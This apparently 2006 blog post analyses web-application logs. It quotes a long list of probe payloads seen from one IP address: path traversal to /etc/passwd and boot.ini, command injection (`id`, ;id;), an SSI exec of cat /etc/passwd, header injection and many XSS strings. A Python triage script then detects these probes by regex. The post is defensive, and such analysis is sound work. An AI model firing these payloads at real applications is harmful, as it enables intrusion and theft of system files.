The Attack on Web Applications - Using Jedi Foresight


Level: Advanced

While conducting log analysis around a new web application we have been developing, the ever-vigilant Obijan
noticed what appears to be an individual using automated tools to probe the application
in several nefarious ways. We can also assume that they are running the same styles of attack
against every form on the site.

For example, here we see attempts at:
- SQL Injection
- Path Traversal
- Remote Execution
- SSI (Server Side Includes)
- XSS (Cross Site Scripting)


The requests originated from this IP address: 69.3.195.226.
OrgName: Covad Communications Co.
OrgID: CVAD
Address: 2510 Zanker Rd.
City: San Jose
StateProv: CA
PostalCode: 95131
Country: US
Fortunately, all the attacks were unsuccessful, but it is something to keep in mind
whenever you design an application. Any application you put online will
be found by spiders and will be hammered in every way, shape or form possible.
Here is a sample of some of the not-so-nice "requests" this person
made.

"`id`"
""
"id"
"|id"
"/../../../../../../../../../../etc/passwd"
"/../../../../../../../../../../etc/passwd^^"
"id"
"/../../../../../../../../../../../boot.ini"
"/../../../../../../../../../../../boot.ini"
"`"
"/etc/passwd"
"/boot.ini"
"
"
"%00"
"%0a"
".\\./.\\./.\\./.\\./.\\./.\\./etc/passwd"
"/../../../../../../../../bin/id|"
"/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini"
"/./././././././././././etc/passwd"
"/..\../..\../..\../..\../..\../..\../etc/passwd"
"/..\../..\../..\../..\../..\../..\../boot.ini"
"/./././././././././././boot.ini"
"/../../../../../../../../*"
","
";"
"\'"
"/'"
"*'"
""
"*"
"/"
""
"<!--#exec cmd=""/bin/cat /etc/passwd""-->"
"
/bin/cat /etc/passwd"
"/../../../../../../../../../../boot.ini"
";id;"
"\\'/bin/cat /etc/passwd\\'"
"`dir`"
"'"
"..\..\..\..\..\..\..\..\..\..\boot.ini"
"..\..\..\..\..\..\..\..\..\..\boot.ini"
"\..\..\..\..\..\..\..\..\..\..\boot.ini"
"..\..\..\..\..\..\..\..\..\..\etc\passwd"
"\..\..\..\..\..\..\..\..\..\..\etc\passwd"
"..\..\..\..\..\..\..\..\..\..\etc\passwd"
"\..\..\..\..\..\..\..\..\..\..\etc\passwd"
"C:\boot.ini"
"C:/boot.ini"
"/../../../../../../../../../../../boot.ini"
"/../../../../../../../../../../../boot.ini"
"/../../../../../../../../../../../etc/passwd"
"/../../../../../../../../../../../etc/passwd"
"
InjectedHeader: InjectedValue"
""";id"""
"|id|"
"/index.html|id|"
"../../../../../../../../conf/server.xml"
"<script>SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS</script>"
""" style=""background:url(javascript:alert(SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS))""
"""
"'><script>alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')</script><'"
"""><script>alert(""SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS"")</script><"""
"' alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS') '"
""" alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')
"""
"<\0script>alert(""SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS"");<s\0cript>"
"<IMG SRC=""javascript:alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS');"">"
"""><LINK REL=""stylesheet"" HREF=""javascript:alert('SPI_XSS');"">"
"""><IMG STYLE='xss:expre\ssion(alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS'))'>"
"""><BODY ONLOAD=alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')>"
"""><STYLE>@im\port""\ja\vasc\ript:alert('XSS')"";</STYLE>"
"""><IMG SRC='vbscript:msgbox(""SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS"")'><"""
"""><TABLE BACKGROUND=""javascript:alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')""><"
"<script>SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS</script>"
""" style=""background:url(javascript:alert(SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS))""
"""
"'><script>alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')</script><'"
"""><script>alert(""SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS"")</script><"""
"' alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS') '"
""" alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')
"""
"<\0script>alert(""SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS"");<s\0cript>"
"<IMG SRC=""javascript:alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS');"">"
"""><IMG STYLE='xss:expre\ssion(alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS'))'>"
"""><BODY ONLOAD=alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')>"
"""><IMG SRC='vbscript:msgbox(""SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS"")'><"""
"""><TABLE BACKGROUND=""javascript:alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')""><"
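The five probe classes listed above can be picked out of an access log mechanically rather than by eye. The following is an added example, not code from the original post: a small triage script that URL-decodes each requested path, tags it with the probe classes whose signature it matches, and tallies hits per source IP. The log format, the signatures and the sample lines (built from payloads quoted in the post) are my own constructions and deliberately illustrative rather than exhaustive.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Illustrative signatures for the probe classes the post names. They run on the
# URL-decoded request so "%2e%2e/" and "../" are treated alike. Real rule sets
# are far larger; these are enough to tag the samples quoted in the post.
SIGNATURES = {
    "sql_injection": re.compile(r"(?<![A-Za-z])'|'(?![A-Za-z])"),  # stray quote: ' \' /'
    "path_traversal": re.compile(r"\.\.[\\/]|\.\\\./|/etc/passwd|boot\.ini|conf/server\.xml", re.I),
    "remote_execution": re.compile(r"`[^`]*`|[|;]\s*(?:id|dir)\b|/bin/(?:id|cat)\b", re.I),
    "ssi": re.compile(r"<!--\s*#\s*\w+", re.I),
    "xss": re.compile(r"<\s*/?\s*script|javascript:|vbscript:|\bon\w+\s*=|expression\s*\(", re.I),
}

# Apache common log format (assumed): ip ident user [time] "METHOD path PROTO" status size
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})')

# Constructed sample lines; the payloads are ones the post quotes, URL-encoded.
SAMPLE_LOG = [
    '69.3.195.226 - - [11/Apr/2006:18:02:11 -0700] "GET /search?q=%60id%60 HTTP/1.1" 200 512',
    '69.3.195.226 - - [11/Apr/2006:18:02:12 -0700] "GET /search?q=/../../../../etc/passwd HTTP/1.1" 404 210',
    '69.3.195.226 - - [11/Apr/2006:18:02:13 -0700] "GET /search?q=%3C!--%23exec%20cmd=%22/bin/cat%20/etc/passwd%22--%3E HTTP/1.1" 200 512',
    '69.3.195.226 - - [11/Apr/2006:18:02:14 -0700] "GET /search?q=%27%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512',
    '69.3.195.226 - - [11/Apr/2006:18:02:15 -0700] "GET /search?q=%5C%27 HTTP/1.1" 200 512',
    '10.0.0.7 - - [11/Apr/2006:18:03:00 -0700] "GET /search?q=jedi+foresight HTTP/1.1" 200 812',
]


def classify(value):
    """Return the set of probe classes whose signature matches the decoded value.
    A single probe can legitimately land in several classes (e.g. '><script>)."""
    decoded = unquote(value)
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}


def triage(lines):
    """Map each source IP that sent at least one suspicious request to a
    Counter of probe classes seen from it. Unparseable lines are skipped."""
    per_ip = {}
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = classify(m.group("path"))
        if hits:
            per_ip.setdefault(m.group("ip"), Counter()).update(hits)
    return per_ip


if __name__ == "__main__":
    for ip, counts in triage(SAMPLE_LOG).items():
        print(ip, dict(counts))  # one line per probing source
```

Because the tally is per source IP, a single host hitting every form with the same probe set stands out even when each individual request returns a harmless 200 or 404.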

About this Entry

This page contains a single entry by published on April 11, 2006 7:15 PM.
